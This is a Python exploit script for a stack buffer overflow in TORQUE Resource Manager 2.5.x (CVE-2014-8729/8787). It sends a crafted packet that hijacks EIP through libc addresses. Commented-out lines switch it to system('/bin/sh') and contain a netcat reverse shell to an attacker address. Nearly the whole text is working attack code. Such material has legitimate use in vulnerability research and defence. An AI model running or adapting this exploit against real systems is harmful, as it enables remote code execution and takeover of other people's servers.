#!/usr/bin/env python # Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow # Date: 10 Nov 2014 # Exploit Author: @inso - Moussajee Thomas, @socks - Laurenceau Gary # Vulnerability discovered by: Moussajee Thomas, Laurenceau Gary # CVE: CVE-2014-8729, CVE-2014-8787 # Vendor Homepage: http://www.adaptivecomputing.com/ # Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/ # Version tested: 2.5.12 # Version affected : 2.5.x - 2.5.13 # Tested on: Debian 32bit with ASLR disabled # ROP on exit(42) with control of EAX register # can be customisable (uncoment line) for reverse shellcode execution if NX is disabled import socket import sys import struct def off(o): return struct.pack('I',o) plt = { 'exit' : off(0xb7dd8270), 'system': off(0xb7de4c30), } if (len(sys.argv) == 3): ip = sys.argv[1] port = sys.argv[2] if (len(sys.argv) == 2): ip = sys.argv[1] port = 15001 else: ip = "192.168.211.145" port = 15001 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) offset = 143 # number to read header = str(len(str(offset))) + str(offset) + '1' #header dis protocol torque packet = header packet += 'c' * 60 # padding packet += plt['exit'] # set EIP to exit() address (comment for bin/sh execution) may diffear print exit on gdb #packet += plt['system'] # set EIP to system() address (uncoment for bin/sh execution) may diffear print system on gdb packet += 'a' * 4 # padding packet += chr(42) # set EAX to 42 '*' (comment for bin/sh execution) # #packet += ('\xb4\x5f\xee\xb7') # set EAX on "/bin/sh" address on libc (uncoment for bin/sh execution) may diffear find [system address], +999999999999, "/bin/sh" on gdb #packet += (0x8bd5930 + (len(packet) + 1 - len(header)) # EAX on buffer address + 68 for set at "netcat" #packet = 'nc -e /bin/sh 192.168.1.19 1337' + '\x00' # reverse shell and set null at the end of the string packet += 'b' * (148 - len(packet)) # padding (comment for bin/sh execution) print "sending buffer to " + ip + ':' + str(port) print "size : " + str(len(packet)) # 148 if offset = 143 #print packet.encode("hex") s.sendall(packet) s.close()